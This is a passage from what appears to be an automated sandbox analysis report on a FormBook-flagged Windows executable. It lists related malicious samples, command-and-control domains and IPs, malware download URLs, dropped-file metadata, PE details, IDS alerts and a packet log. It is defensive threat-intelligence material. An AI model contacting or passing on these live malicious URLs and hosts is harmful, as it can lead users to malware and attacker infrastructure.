                                                                • www.thaoduocvietvn.online/nquy/?JF=u9evqxZMGgKfs69v9/2xdXFxxN/YJ4WehP421wEp0tTEO3G6A3EDPphK1t7D3CuUE6PDuRldJIYEw0Z9Ouaa0Du1JdKkzys5Lg==&0vS=VvX878uHn6aDcRz
                                                                Overdue SOA.exeGet hashmaliciousBrowse
                                                                • www.vuongnudan.site/6hsc/?OBs8ph=rdmYyOqMEWNErD8nsvu9s8+DoEr3Pj0i98K/wPQF5Bsi0lFa+QKx/EeEATqH3j7a85s/&lFQ=VHApdxjPqB
                                                                HSBC Customer Information.com.exeGet hashmaliciousBrowse
                                                                • www.granolanuts.online/ogxr/?nFQTzL6=AQyG0md181Ogy/Ks6KWLVBza+i4BJWUNKi7fRYyk7j41v6Vps1vWMaydOUVV2ODUWQgKNmS7UAOIpV1hqCFnI/2b4MQwQX8Wgg==&jT2lTB=AZ-HKt
                                                                Pepsico LLC RFQ Information.com.exeGet hashmaliciousBrowse
                                                                • www.granolanuts.online/ogxr/?7nmPFn0=AQyG0md181Ogy/Ks6KWLVBza+i4BJWUNKi7fRYyk7j41v6Vps1vWMaydOUVV2ODUWQgKNmS7UAOIpV1hqCFnI/2b4MQwQX8Wgg==&kP2d-p=8pJX
                                                                Pepsico LLC RFQ 100729150.com.exeGet hashmaliciousBrowse
                                                                • www.granolanuts.online/ogxr/?x6yD=AQyG0md181Ogy/Ks6KWLVBza+i4BJWUNKi7fRYyk7j41v6Vps1vWMaydOUVV2ODUWQgKNmS7UAOIpV1hqCFnI/2b4MQwQX8Wgg==&eR-=1brXuvI

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                www.sandpiper-apts.commt103.jsGet hashmaliciousBrowse
                                                                • 164.88.201.214
                                                                file.exeGet hashmaliciousBrowse
                                                                • 164.88.201.214
                                                                www.suachuadienlanh247.commt103.jsGet hashmaliciousBrowse
                                                                • 103.221.223.104
                                                                file.exeGet hashmaliciousBrowse
                                                                • 103.221.223.104
                                                                www.n-r-eng.comfile.exeGet hashmaliciousBrowse
                                                                • 185.151.199.52
                                                                www.teammart.onlinemt103.jsGet hashmaliciousBrowse
                                                                • 184.94.215.91
                                                                file.exeGet hashmaliciousBrowse
                                                                • 184.94.215.91

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                AMAZON-02UShttps://indd.adobe.com/view/e4211cf6-626a-4229-b489-27e41cc93575Get hashmaliciousBrowse
                                                                • 13.224.103.17
                                                                Lucky Step-Walking Tracker_1.0.59_apkcombo.com.apkGet hashmaliciousBrowse
                                                                • 13.228.114.107
                                                                mt103.jsGet hashmaliciousBrowse
                                                                • 18.138.206.213
                                                                https://qha4c.app.link/xtg1RqDrPwbGet hashmaliciousBrowse
                                                                • 13.224.103.84
                                                                https://qha4c.app.link/xtg1RqDrPwbGet hashmaliciousBrowse
                                                                • 13.224.103.74
                                                                Quotation.xlsGet hashmaliciousBrowse
                                                                • 3.64.163.50
                                                                https://1drv.ms/w/s!Av2X_TI0iGesdVmLCSC_aXZHcOQGet hashmaliciousBrowse
                                                                • 99.86.4.74
                                                                j7XfGPCkmv.exeGet hashmaliciousBrowse
                                                                • 75.2.60.5
                                                                0iA8vl1ZbP.exeGet hashmaliciousBrowse
                                                                • 99.83.231.61
                                                                https://temp-rgsxywerhhbzwdbcugyp.webador.com/?_gl=1*19q69zb*_ga*MjExMTI4Njk5My4xNjc0ODI4ODUx*_ga_E6PZPGE4QM*MTY3NTA2OTYzMC41LjEuMTY3NTA3MTU1OC4wLjAuMA..Get hashmaliciousBrowse
                                                                • 52.218.0.128
                                                                http://195.133.18.119/bins/dark.x86Get hashmaliciousBrowse
                                                                • 54.148.70.121
                                                                Product List Pdf.exeGet hashmaliciousBrowse
                                                                • 3.64.163.50
                                                                order.exeGet hashmaliciousBrowse
                                                                • 3.64.163.50
                                                                E-FCR Docs_pdf.exeGet hashmaliciousBrowse
                                                                • 3.127.73.216
                                                                http://195.133.40.73/bins/Paralysis.armGet hashmaliciousBrowse
                                                                • 35.162.71.253
                                                                https://doubleclick.net/aclk?sa=l&ai=CiX22MRm0Y9DdM-SKtOUPv7yaEPzWzaNu9d-tquAQsdH93wUQASDYzIslYMnG5ozkpMAToAGhwJjxKMgBCagDAcgDmwSqBNkBT9Dp5t8dWcQBlDe4d5dh20Ul04HCVoWXJs61oFFltikQj1oSykzI_2FRdQ-aNO1l72ro2jsCE2yw-H9VNL6ejR2MTzCVYRzlkT4m-lH-lKLYJc-40_k09zJygDo9cg6ttq9d6p9Rl1y3YRMzN_X1Y5r2iwXtqVDqraIv-Dm9G5cwiKW8-2-AykaZyrhRUx1pQzQOjAAHVnlLGbeg2XtJtyFKBQW-OTBhMXoGAUVgm-kv4n-qPNZoctr8Vg2iBj8VkFG1HErFttzbK-GzH2tmRD3GvmMMD8HMRMAEjMrq-JoE-gUGCCUQARgAoAYugAeX1eLRA6gHjs4bqAeT2BuoB-6WsQKoB_6esQKoB6SjsQKoB6a-G6gHmgaoB_PRG6gHltgbqAeqm7ECqAf_nrECqAffn7EC2AcAwAgB0ggPCIBhEAEYADICigI6AoBA8ggNYmlkZGVyLTIzNDM0OIAKBJALA5gLAcgLAYAMAbgMAdgTDNAVAfgWAYAXAQ&ae=1&num=1&pr=2:0.44428&cid=CAQSGwDq26N9g7lUMdFJS8QkE1M0Zob561A2eQ3rfhgBIAo&sig=AOD64_3tAF0qW-0ZWDDg68iZ2Tziw4fTGA&client=ca-pub-2399441271239169&nb=300119&adurl=https://concur.alynoel.com/vF4zrbraF4zr9skF4znd07F4zlsa51dF4znW1F4z-grou2Tvd07r9sonW1Get hashmaliciousBrowse
                                                                • 13.226.175.56
                                                                Proofpoint SOP.docx.docGet hashmaliciousBrowse
                                                                • 99.86.159.126
                                                                Proofpoint SOP.docx.docGet hashmaliciousBrowse
                                                                • 54.153.244.97
                                                                EFX8343644.htmlGet hashmaliciousBrowse
                                                                • 99.84.88.108
                                                                inf2.exeGet hashmaliciousBrowse
                                                                • 3.69.157.220
                                                                PARTNER-ASILfile.exeGet hashmaliciousBrowse
                                                                • 185.151.199.52
                                                                wf5nAcVPV1.elfGet hashmaliciousBrowse
                                                                • 2.55.19.30
                                                                Ur83Jcc2vY.elfGet hashmaliciousBrowse
                                                                • 176.230.220.23
                                                                z3cSdM9V7h.elfGet hashmaliciousBrowse
                                                                • 176.231.92.112
                                                                wEUDEoKUr8.elfGet hashmaliciousBrowse
                                                                • 2.55.156.154
                                                                AsITRcUt8t.elfGet hashmaliciousBrowse
                                                                • 176.229.227.14
                                                                hz7nI1U6H5.elfGet hashmaliciousBrowse
                                                                • 2.53.31.53
                                                                8jK7X0Nc8M.elfGet hashmaliciousBrowse
                                                                • 31.154.123.133
                                                                CTqo4JwsCU.elfGet hashmaliciousBrowse
                                                                • 31.154.123.100
                                                                6sBmn1CQ1O.elfGet hashmaliciousBrowse
                                                                • 31.154.35.225
                                                                WUeiLv48pb.elfGet hashmaliciousBrowse
                                                                • 31.154.35.249
                                                                xmogum.i686.elfGet hashmaliciousBrowse
                                                                • 2.55.108.236
                                                                dark.x86Get hashmaliciousBrowse
                                                                • 176.230.100.192
                                                                CsCSQk1UOj.elfGet hashmaliciousBrowse
                                                                • 2.52.115.228
                                                                0ZWx91rasR.elfGet hashmaliciousBrowse
                                                                • 2.53.105.148
                                                                PSlc8imSQa.elfGet hashmaliciousBrowse
                                                                • 2.53.79.31
                                                                sora.arm.elfGet hashmaliciousBrowse
                                                                • 2.55.156.150
                                                                soI8yStlNX.elfGet hashmaliciousBrowse
                                                                • 2.55.156.148
                                                                3PFX5qTLd5.elfGet hashmaliciousBrowse
                                                                • 176.228.155.129
                                                                ascaris.x86_64.elfGet hashmaliciousBrowse
                                                                • 176.228.107.202

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):226
                                                                Entropy (8bit):5.3467126928258955
                                                                Encrypted:false
                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

                                                                C:\Users\user\AppData\Local\Temp\30q5648k6

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                Category:dropped
                                                                Size (bytes):94208
                                                                Entropy (8bit):1.2891393435168748
                                                                Encrypted:false
                                                                SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.947521655611989
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:file.exe
                                                                File size:615936
                                                                MD5:02df8c86345d056735fa60116b93ed2b
                                                                SHA1:70294e9e09c8d9d895599b73d1091c4013aee691
                                                                SHA256:c7627adc0797d3315c2c942356c8cb1fca39afbd0335512236be79a6e2f7acb3
                                                                SHA512:02a16ffda407d61663e2cbc8fe2d4699528aa439e5899b773484c197a823d414da197b0a6e4aa18ff962e12e7268bdd358399d58502700e262cbb7201ee549a6
                                                                SSDEEP:12288:OCF4GQWsWKKlWr2LD1WpN8Vm62Mum/sxMjp2ilM:Oi4GQWs0LpW0m62IsaJW
                                                                TLSH:7AD41202A6235703D425557180FB452113F6FFCBB633C35AEF89F3A4AA113ABAE55782
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................X..........nw... ........@.. ....................................`................................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x49776e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0xC2A5F7A7 [Sun Jun 25 22:52:23 2073 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x977200x4b.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x9a0000x588.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x976e20x1c.text
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x957740x95800False0.9615335623954849data7.9572107240717935IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .sdata0x980000x1e80x200False0.861328125data6.620478097886401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x9a0000x5880x600False0.4166666666666667data4.041329299267579IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x9c0000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_VERSION0x9a0a00x2fcdata
                                                                RT_MANIFEST0x9a39c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                192.168.2.6184.94.215.9149729802031449 01/30/23-14:52:54.016726TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.6184.94.215.91
                                                                192.168.2.6184.94.215.9149729802031453 01/30/23-14:52:54.016726TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.6184.94.215.91
                                                                192.168.2.6184.94.215.9149729802031412 01/30/23-14:52:54.016726TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.6184.94.215.91

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 30, 2023 14:52:04.943106890 CET4971280192.168.2.62.57.90.16
                                                                Jan 30, 2023 14:52:04.975765944 CET80497122.57.90.16192.168.2.6
                                                                Jan 30, 2023 14:52:04.976032972 CET4971280192.168.2.62.57.90.16
                                                                Jan 30, 2023 14:52:04.976145029 CET4971280192.168.2.62.57.90.16
                                                                Jan 30, 2023 14:52:05.008644104 CET80497122.57.90.16192.168.2.6
                                                                Jan 30, 2023 14:52:05.010261059 CET80497122.57.90.16192.168.2.6
                                                                Jan 30, 2023 14:52:05.010299921 CET80497122.57.90.16192.168.2.6
                                                                Jan 30, 2023 14:52:05.010493994 CET4971280192.168.2.62.57.90.16
                                                                Jan 30, 2023 14:52:05.010751009 CET4971280192.168.2.62.57.90.16
                                                                Jan 30, 2023 14:52:05.043397903 CET80497122.57.90.16192.168.2.6
                                                                Jan 30, 2023 14:52:15.297939062 CET4971380192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:15.369946957 CET8049713185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:15.370146990 CET4971380192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:15.370327950 CET4971380192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:15.445178032 CET8049713185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:15.456197977 CET8049713185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:15.456239939 CET8049713185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:15.456331015 CET4971380192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:16.881261110 CET4971380192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:17.894681931 CET4971480192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:17.965270996 CET8049714185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:17.965460062 CET4971480192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:17.967179060 CET4971480192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:18.037061930 CET8049714185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:18.047092915 CET8049714185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:18.047139883 CET8049714185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:18.047210932 CET4971480192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:19.472685099 CET4971480192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:20.489039898 CET4971580192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:20.570301056 CET8049715185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:20.570504904 CET4971580192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:20.571834087 CET4971580192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:20.651204109 CET8049715185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:20.651880026 CET8049715185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:20.651926041 CET8049715185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:20.652086973 CET4971580192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:20.652251959 CET4971580192.168.2.6185.151.199.52
                                                                Jan 30, 2023 14:52:20.731209040 CET8049715185.151.199.52192.168.2.6
                                                                Jan 30, 2023 14:52:25.787637949 CET4971980192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:25.997071028 CET8049719164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:25.997864962 CET4971980192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:25.997982025 CET4971980192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:26.207463980 CET8049719164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:26.207703114 CET8049719164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:26.207734108 CET8049719164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:26.207873106 CET4971980192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:27.504578114 CET4971980192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:28.591609955 CET4972080192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:28.797813892 CET8049720164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:28.797957897 CET4972080192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:28.798149109 CET4972080192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:29.004092932 CET8049720164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:29.004182100 CET8049720164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:29.004303932 CET8049720164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:29.004419088 CET4972080192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:30.904295921 CET4972080192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:31.911798000 CET4972180192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:32.120682955 CET8049721164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:32.123462915 CET4972180192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:32.123620033 CET4972180192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:32.332484007 CET8049721164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:32.332516909 CET8049721164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:32.332534075 CET8049721164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:32.332792044 CET4972180192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:32.338372946 CET4972180192.168.2.6164.88.201.214
                                                                Jan 30, 2023 14:52:32.547024012 CET8049721164.88.201.214192.168.2.6
                                                                Jan 30, 2023 14:52:37.380860090 CET4972380192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:37.581434965 CET804972318.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:37.581515074 CET4972380192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:37.581681967 CET4972380192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:37.781790018 CET804972318.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:37.781827927 CET804972318.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:37.781847000 CET804972318.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:37.781984091 CET4972380192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:39.083671093 CET4972380192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:40.100408077 CET4972480192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:40.297971010 CET804972418.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:40.298177004 CET4972480192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:40.298743963 CET4972480192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:40.495136976 CET804972418.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:40.495173931 CET804972418.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:40.495204926 CET804972418.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:40.495225906 CET804972418.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:40.495290041 CET4972480192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:41.802678108 CET4972480192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:42.819000006 CET4972580192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:43.021802902 CET804972518.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:43.022082090 CET4972580192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:43.022285938 CET4972580192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:43.224601984 CET804972518.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:43.224649906 CET804972518.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:43.224672079 CET804972518.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:43.224827051 CET4972580192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:43.225006104 CET4972580192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:43.428596020 CET804972518.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:48.277234077 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:48.449347019 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.449539900 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:48.450901985 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:48.623519897 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741343975 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741385937 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741414070 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741441965 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741463900 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741514921 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:48.741554976 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:50.120781898 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.132191896 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.303395033 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.303572893 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.304053068 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.472388029 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.472587109 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.578947067 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.578978062 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.578998089 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.579137087 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.579138994 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.579185963 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.579230070 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.579277992 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:52.819386005 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:53.835388899 CET4972980192.168.2.6184.94.215.91
